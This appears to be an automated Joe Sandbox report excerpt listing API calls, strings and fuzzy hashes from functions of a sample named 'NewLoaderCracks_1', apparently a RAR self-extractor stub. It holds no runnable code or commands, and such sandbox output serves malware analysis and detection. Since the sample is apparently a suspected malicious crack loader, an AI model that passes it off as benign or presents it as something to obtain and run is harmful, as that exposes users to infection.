                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID: PW
                • API String ID: 161543041-441173047
                • Opcode ID: 70bc5bb57ea32ec585939f0147650246eb3a706856d9e1d79b2da1f26caa1d8f
                • Instruction ID: fadf8d3fd8d9f80b3b37abe8d6e154b37e22e78461ac7d01da74cbdf52eb5f4a
                • Opcode Fuzzy Hash: 70bc5bb57ea32ec585939f0147650246eb3a706856d9e1d79b2da1f26caa1d8f
                • Instruction Fuzzy Hash: 6F317E316003069FEF20AA79D989B7ABFE9FF40315F148969E489D7651DF31AC80DB60
                APIs
                • GetWindow.USER32(?,00000005), ref: 0055CD51
                • GetClassNameW.USER32(00000000,?,00000800), ref: 0055CD7D
                  • Part of subcall function 005517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0054BB05,00000000,.exe,?,?,00000800,?,?,005585DF,?), ref: 005517C2
                • GetWindowLongW.USER32(00000000,000000F0), ref: 0055CD99
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0055CDB0
                • GetObjectW.GDI32(00000000,00000018,?), ref: 0055CDC4
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0055CDED
                • DeleteObject.GDI32(00000000), ref: 0055CDF4
                • GetWindow.USER32(00000000,00000002), ref: 0055CDFD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: 07c5d22953409a940efae0fbd9433326db861a604059e9e5ad7d3b4302ba9644
                • Instruction ID: 0cb90ee4e2e39c503b1d721aec961a9a13320d7db8781d2cb432ef372f04f25f
                • Opcode Fuzzy Hash: 07c5d22953409a940efae0fbd9433326db861a604059e9e5ad7d3b4302ba9644
                • Instruction Fuzzy Hash: 3E110D32544311BFE3216B649C1FF9F3E6CFF56742F014422FE41E5091CA78890DA6A4
                APIs
                • _free.LIBCMT ref: 00568EC5
                  • Part of subcall function 005684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958), ref: 005684F4
                  • Part of subcall function 005684DE: GetLastError.KERNEL32(00573958,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958,00573958), ref: 00568506
                • _free.LIBCMT ref: 00568ED1
                • _free.LIBCMT ref: 00568EDC
                • _free.LIBCMT ref: 00568EE7
                • _free.LIBCMT ref: 00568EF2
                • _free.LIBCMT ref: 00568EFD
                • _free.LIBCMT ref: 00568F08
                • _free.LIBCMT ref: 00568F13
                • _free.LIBCMT ref: 00568F1E
                • _free.LIBCMT ref: 00568F2C
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 38cf1051498fe998f883bd772ba937d39b27eb7318bb25dc3ea6c7a14fcef2b8
                • Instruction ID: 7b5b078177a93eeff200b23db70dd182089aa67f62d2d71d421cb79fc3b17275
                • Opcode Fuzzy Hash: 38cf1051498fe998f883bd772ba937d39b27eb7318bb25dc3ea6c7a14fcef2b8
                • Instruction Fuzzy Hash: AA11A47650010EAFCF11EF54C886CEE7FA9FF44355B5182A5BA088B626DE31DE519B80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: e950b648b68034566b74a0a74b80a7dcf787aa51a29b18bf4bd3d8373847f647
                • Instruction ID: 01d5e02ad77995d20c3d5be5e4c0ad8e0586c5b98c458ac6f43d95ee33495f05
                • Opcode Fuzzy Hash: e950b648b68034566b74a0a74b80a7dcf787aa51a29b18bf4bd3d8373847f647
                • Instruction Fuzzy Hash: 33F137706042515BDB15EF3888D9BFE7FA5BFD1308F484869FC85CB287DA649848C7A2
                APIs
                  • Part of subcall function 0054130B: GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                  • Part of subcall function 0054130B: SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                • EndDialog.USER32(?,00000001), ref: 0055AD20
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 0055AD47
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0055AD60
                • SetWindowTextW.USER32(?,?), ref: 0055AD71
                • GetDlgItem.USER32(?,00000065), ref: 0055AD7A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0055AD8E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0055ADA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: 91155a61c12332b9d2f5cd3610ab18b7b8415becff19baee8a6ee2fbe9485288
                • Instruction ID: ef49d60fecc82fc8000ef95ef599215a8a194ae3dd3b9bae493bf0511a9dfb57
                • Opcode Fuzzy Hash: 91155a61c12332b9d2f5cd3610ab18b7b8415becff19baee8a6ee2fbe9485288
                • Instruction Fuzzy Hash: F321A032244205BBD6216B75EC5EE3B3F7CFB66B47F010506FA45A24A0DA625909F632
                APIs
                • __EH_prolog.LIBCMT ref: 00549448
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0054946B
                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0054948A
                  • Part of subcall function 005517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0054BB05,00000000,.exe,?,?,00000800,?,?,005585DF,?), ref: 005517C2
                • _swprintf.LIBCMT ref: 00549526
                  • Part of subcall function 0054400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0054401D
                • MoveFileW.KERNEL32(?,?), ref: 00549595
                • MoveFileW.KERNEL32(?,?), ref: 005495D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: d7e11763f10bae5827425b7bded0d52435b454d5fd3f9fea163d5ef4ce7933b4
                • Instruction ID: b817f63578da6cc268e802ec711dc0cc8d0488ef47ae1da4bfe0c6ba60bf49d2
                • Opcode Fuzzy Hash: d7e11763f10bae5827425b7bded0d52435b454d5fd3f9fea163d5ef4ce7933b4
                • Instruction Fuzzy Hash: AE41847190015A66DF20EB649C8AEDF7B7CBF95388F0444E5B549E3042EB348F88DB64
                APIs
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00558F38
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00558F59
                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00558F80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Global$AllocByteCharCreateMultiStreamWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 4094277203-4209811716
                • Opcode ID: ba034f23d86ea8aa26ba5dcbe86584676495abf193bc7d387b503698514df257
                • Instruction ID: dff1ba037e0d62762bf187f73d83efa6b8197b26343246c6955a4907c3abaf20
                • Opcode Fuzzy Hash: ba034f23d86ea8aa26ba5dcbe86584676495abf193bc7d387b503698514df257
                • Instruction Fuzzy Hash: C43126311083166BD710AB20AC0AF7B7FA8FF96721F00401AFC01A71D1EF649A4DD3A5
                APIs
                • GetLastError.KERNEL32(?,00580EE8,00563E14,00580EE8,?,?,00563713,00000050,?,00580EE8,00000200), ref: 00568FA9
                • _free.LIBCMT ref: 00568FDC
                • _free.LIBCMT ref: 00569004
                • SetLastError.KERNEL32(00000000,?,00580EE8,00000200), ref: 00569011
                • SetLastError.KERNEL32(00000000,?,00580EE8,00000200), ref: 0056901D
                • _abort.LIBCMT ref: 00569023
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID: XW
                • API String ID: 3160817290-708546550
                • Opcode ID: b939a8d7f2ccdae3e33c3620d59187afde31821fe3bccf898912666ebe612e95
                • Instruction ID: e5b836b3e8fecf9f9e5c940c3cd9b677baf1a70c6e6038829605b5d3a548eabc
                • Opcode Fuzzy Hash: b939a8d7f2ccdae3e33c3620d59187afde31821fe3bccf898912666ebe612e95
                • Instruction Fuzzy Hash: B7F0C835504A126ACB2233687C0EB3B6D6ABFE1771F350214F519E3292EE21CD457525
                APIs
                • __aulldiv.LIBCMT ref: 00550A9D
                  • Part of subcall function 0054ACF5: GetVersionExW.KERNEL32(?), ref: 0054AD1A
                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00550AC0
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00550AD2
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00550AE3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00550AF3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00550B03
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00550B3D
                • __aullrem.LIBCMT ref: 00550BCB
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: cd4e2a14d0e783dce79d2a3a93031e74b13c96dc44fb48a42d52f742ecac3ccc
                • Instruction ID: 55a37237c102e83e6618b9c9d9a5ca8010c15208b8a130b364415a882da8d076
                • Opcode Fuzzy Hash: cd4e2a14d0e783dce79d2a3a93031e74b13c96dc44fb48a42d52f742ecac3ccc
                • Instruction Fuzzy Hash: 124127B14083069FC714DF64C88496FBBF8FB88725F004E2EF99692650E738E648DB52
                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0056F5A2,?,00000000,?,00000000,00000000), ref: 0056EE6F
                • __fassign.LIBCMT ref: 0056EEEA
                • __fassign.LIBCMT ref: 0056EF05
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0056EF2B
                • WriteFile.KERNEL32(?,?,00000000,0056F5A2,00000000,?,?,?,?,?,?,?,?,?,0056F5A2,?), ref: 0056EF4A
                • WriteFile.KERNEL32(?,?,00000001,0056F5A2,00000000,?,?,?,?,?,?,?,?,?,0056F5A2,?), ref: 0056EF83
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: ed418254ecec657695eb024ad9596b484f92bf50a0cf60f465eff0d1e0281b0e
                • Instruction ID: 427c0fa1bffd8e1b701ef0e929185b3f0867defff90e4e90ab6782a6bbb77218
                • Opcode Fuzzy Hash: ed418254ecec657695eb024ad9596b484f92bf50a0cf60f465eff0d1e0281b0e
                • Instruction Fuzzy Hash: 9451B074A012099FCB10CFA8D886AEEFFF9FF19710F24451AE955E7291E730A940CB60
                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 0055C54A
                • _swprintf.LIBCMT ref: 0055C57E
                  • Part of subcall function 0054400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0054401D
                • SetDlgItemTextW.USER32(?,00000066,0058946A), ref: 0055C59E
                • _wcschr.LIBVCRUNTIME ref: 0055C5D1
                • EndDialog.USER32(?,00000001), ref: 0055C6B2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: 096e650fa414fa9241cd0421fc817ec34c7bf82fbeded449463d40d5b01894d9
                • Instruction ID: aa5e32ab6528f0ad9e2e3fb4c5c8eef1c7cee46881824559bd30888c6eff8653
                • Opcode Fuzzy Hash: 096e650fa414fa9241cd0421fc817ec34c7bf82fbeded449463d40d5b01894d9
                • Instruction Fuzzy Hash: EE41B771900618AEEF22DB94DC55EEA7FBCFB54306F0050A7E909E6060E7719BC8CB50
                APIs
                • ShowWindow.USER32(?,00000000), ref: 0055964E
                • GetWindowRect.USER32(?,00000000), ref: 00559693
                • ShowWindow.USER32(?,00000005,00000000), ref: 0055972A
                • SetWindowTextW.USER32(?,00000000), ref: 00559732
                • ShowWindow.USER32(00000000,00000005), ref: 00559748
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: c1fcc5be988ac69c8d5fc882abc5269d4ceb5e9a836672810f325efadefa4326
                • Instruction ID: ca38a4887dfc8e51d90046f5031681512900ba6f09970b7aafac046761026967
                • Opcode Fuzzy Hash: c1fcc5be988ac69c8d5fc882abc5269d4ceb5e9a836672810f325efadefa4326
                • Instruction Fuzzy Hash: 0B31AE31004200EFCB119F68DC8DB6B7FA8FF59702F04855AFE499A162DB38D949DBA1
                APIs
                  • Part of subcall function 0056BF79: _free.LIBCMT ref: 0056BFA2
                • _free.LIBCMT ref: 0056C003
                  • Part of subcall function 005684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958), ref: 005684F4
                  • Part of subcall function 005684DE: GetLastError.KERNEL32(00573958,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958,00573958), ref: 00568506
                • _free.LIBCMT ref: 0056C00E
                • _free.LIBCMT ref: 0056C019
                • _free.LIBCMT ref: 0056C06D
                • _free.LIBCMT ref: 0056C078
                • _free.LIBCMT ref: 0056C083
                • _free.LIBCMT ref: 0056C08E
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction ID: eeb319f81cf9576bc9ae4bfdb1df5596f5ab1c277a5529a75f11906927068adb
                • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                • Instruction Fuzzy Hash: AA111D71540B06F6EA20BBB0DC4AFDBFF997F80700F408925B299A7462DF65A9448B90
                APIs
                • GetLastError.KERNEL32(?,?,005620C1,0055FB12), ref: 005620D8
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005620E6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005620FF
                • SetLastError.KERNEL32(00000000,?,005620C1,0055FB12), ref: 00562151
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 0ac3da19ff8ac971a29ab65b29336f062e9fe9e7508968d1549328684779bfcb
                • Instruction ID: 504c0c9a7b6cb9746c274c4f4bab4f4155e3fcfb55cdfb762b05b5afe1f8c33e
                • Opcode Fuzzy Hash: 0ac3da19ff8ac971a29ab65b29336f062e9fe9e7508968d1549328684779bfcb
                • Instruction Fuzzy Hash: 7C01D83220DB126EE7542BB5BC8A52A2E84FB76778B210B69F214571E1EF214C45F144
                APIs
                • GetLastError.KERNEL32(?,00580EE8,00000200,0056895F,005658FE,?,?,?,?,0054D25E,?,02E00180,00000063,00000004,0054CFE0,?), ref: 0056902E
                • _free.LIBCMT ref: 00569063
                • _free.LIBCMT ref: 0056908A
                • SetLastError.KERNEL32(00000000,00573958,00000050,00580EE8), ref: 00569097
                • SetLastError.KERNEL32(00000000,00573958,00000050,00580EE8), ref: 005690A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorLast$_free
                • String ID: XW
                • API String ID: 3170660625-708546550
                • Opcode ID: bc01057579930f6c6d6e1c8d2c5b45e41ce298050fe28fb44de855f852768069
                • Instruction ID: 7cfb72ce9f3452d55eec930072255d0d45fc5d5aeaaf11d602445618ae138285
                • Opcode Fuzzy Hash: bc01057579930f6c6d6e1c8d2c5b45e41ce298050fe28fb44de855f852768069
                • Instruction Fuzzy Hash: BC01F476505B026AC72267757C8E93B2E5DBBE13717300224F50AA3252EE70CC457161
